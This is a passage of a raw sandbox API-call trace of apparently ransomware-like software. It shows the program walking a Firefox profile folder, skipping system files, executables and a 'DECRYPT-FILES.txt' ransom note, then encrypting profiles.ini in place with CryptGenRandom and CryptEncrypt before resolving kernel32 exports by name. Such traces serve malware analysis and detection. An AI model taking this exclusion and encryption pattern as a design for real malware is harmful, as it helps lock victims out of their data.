lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb66495d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb66495d0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xc3a63b40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x18000, dwReserved0=0x0, dwReserved1=0x0, cFileName="webappsstore.sqlite", cAlternateFileName="WEBAPP~1.SQL")) returned 0 [0082.241] FindClose (in: hFindFile=0x5f8d58 | out: hFindFile=0x5f8d58) returned 1 [0082.241] CloseHandle (hObject=0x458) returned 1 [0082.241] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x85442390, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x85442390, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="silmbjec.default\\", cAlternateFileName="SILMBJ~1.DEF")) returned 0 [0082.241] FindClose (in: hFindFile=0x5f8d18 | out: hFindFile=0x5f8d18) returned 1 [0082.241] CloseHandle (hObject=0x450) returned 1 [0082.241] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb26740e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x6f, dwReserved0=0x0, dwReserved1=0x0, cFileName="profiles.ini", cAlternateFileName="")) returned 1 [0082.241] lstrcmpiW (lpString1="profiles.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0082.241] lstrcmpiW (lpString1="profiles.ini", lpString2="autorun.inf") returned 1 [0082.241] lstrcmpiW (lpString1="profiles.ini", lpString2="boot.ini") returned 1 [0082.241] lstrcmpiW (lpString1="profiles.ini", lpString2="desktop.ini") returned 1 [0082.241] lstrcmpiW (lpString1="profiles.ini", lpString2="ntuser.dat") returned 1 [0082.241] lstrcmpiW (lpString1="profiles.ini", lpString2="iconcache.db") returned 1 [0082.241] lstrcmpiW (lpString1="profiles.ini", lpString2="bootsect.bak") returned 1 [0082.241] lstrcmpiW (lpString1="profiles.ini", lpString2="ntuser.dat.log") returned 1 [0082.241] lstrcmpiW (lpString1="profiles.ini", lpString2="thumbs.db") returned -1 [0082.241] lstrcmpiW (lpString1="profiles.ini", lpString2="Bootfont.bin") returned 1 [0082.242] lstrlenW (lpString="profiles.ini") returned 12 [0082.242] lstrcmpiW (lpString1="ini", lpString2="lnk") returned -1 [0082.242] lstrcmpiW (lpString1="ini", lpString2="exe") returned 1 [0082.242] lstrcmpiW (lpString1="ini", lpString2="sys") returned -1 [0082.242] lstrcmpiW (lpString1="ini", lpString2="dll") returned 1 [0082.242] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0082.242] lstrlenW (lpString="profiles.ini") returned 12 [0082.242] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" [0082.242] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="profiles.ini" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" [0082.242] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.242] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0082.242] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x3f2d978 | out: lpFileSize=0x3f2d978*=111) returned 1 [0082.242] CreateFileMappingW (hFile=0x450, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x454 [0082.242] MapViewOfFile (hFileMappingObject=0x454, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0082.243] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0082.243] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0082.243] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.244] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d8e0*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d8e0*=0x100) returned 1 [0082.244] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0082.244] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.245] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0082.245] CloseHandle (hObject=0x454) returned 1 [0082.245] SetFilePointerEx (in: hFile=0x450, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.245] WriteFile (in: hFile=0x450, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d900, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d900*=0x108, lpOverlapped=0x0) returned 1 [0082.246] CloseHandle (hObject=0x0) returned 0 [0082.246] CloseHandle (hObject=0x450) returned 1 [0082.246] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.246] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.246] GetTickCount () returned 0x114d098 [0082.246] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.247] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0082.247] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.247] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.247] lstrlenA (lpString="kernel32.dll") returned 12 [0082.247] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0082.247] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0082.247] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0082.247] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0082.248] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0082.248] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0082.248] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0082.248] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0082.248] lstrlenA (lpString="ADDATOMA") returned 8 [0082.248] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0082.248] lstrlenA (lpString="ADDATOMW") returned 8 [0082.248] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0082.248] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0082.248] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0082.248] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0082.248] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0082.248] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0082.248] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0082.248] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0082.248] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0082.248] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0082.248] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0082.248] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0082.248] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0082.248] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0082.248] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0082.248] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0082.248] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0082.248] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0082.248] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0082.248] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0082.248] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0082.248] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0082.248] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0082.248] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0082.248] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0082.248] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0082.248] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0082.248] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0082.248] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0082.249] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0082.249] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0082.249] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0082.249] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0082.249] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0082.249] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0082.249] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0082.249] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0082.249] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0082.249] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0082.249] lstrlenA (lpString="BACKUPREAD") returned 10 [0082.249] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0082.249] lstrlenA (lpString="BACKUPSEEK") returned 10 [0082.249] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0082.249] lstrlenA (lpString="BACKUPWRITE") returned 11 [0082.249] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0082.249] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0082.249] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0082.249] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0082.249] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0082.249] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0082.249] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0082.249] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0082.249] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0082.249] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0082.249] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0082.249] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0082.249] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0082.249] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0082.249] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0082.249] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0082.249] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0082.249] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0082.249] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0082.249] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0082.249] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0082.249] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0082.250] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0082.250] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0082.250] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0082.250] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0082.250] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0082.250] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0082.250] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0082.250] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0082.250] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0082.250] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0082.250] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0082.250] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0082.250] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0082.250] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0082.250] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0082.250] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0082.250] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0082.250] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0082.250] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0082.250] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0082.250] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0082.250] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0082.250] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0082.250] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0082.250] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0082.250] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0082.250] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0082.250] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0082.250] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0082.250] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0082.250] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0082.250] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0082.250] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0082.250] lstrlenA (lpString="BEEP") returned 4 [0082.250] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0082.250] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0082.250] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0082.251] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0082.251] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0082.251] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0082.251] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0082.251] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0082.251] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0082.251] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0082.251] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0082.251] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0082.251] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0082.251] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0082.251] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0082.251] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0082.251] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0082.251] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0082.251] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0082.251] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0082.251] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0082.251] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0082.251] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0082.251] lstrlenA (lpString="CANCELIO") returned 8 [0082.251] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0082.251] lstrlenA (lpString="CANCELIOEX") returned 10 [0082.251] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0082.251] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0082.251] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0082.251] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0082.251] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0082.251] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0082.251] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0082.251] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0082.251] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0082.251] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0082.251] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0082.251] lstrlenA (lpString="CHECKELEVATION") returned 14 [0082.251] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0082.252] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0082.252] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0082.252] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0082.252] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0082.252] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0082.252] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0082.252] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0082.252] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0082.252] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0082.252] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0082.252] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0082.252] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0082.252] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0082.252] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0082.252] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0082.252] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0082.252] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0082.252] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0082.252] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0082.252] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0082.252] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0082.252] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0082.252] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0082.252] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0082.252] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 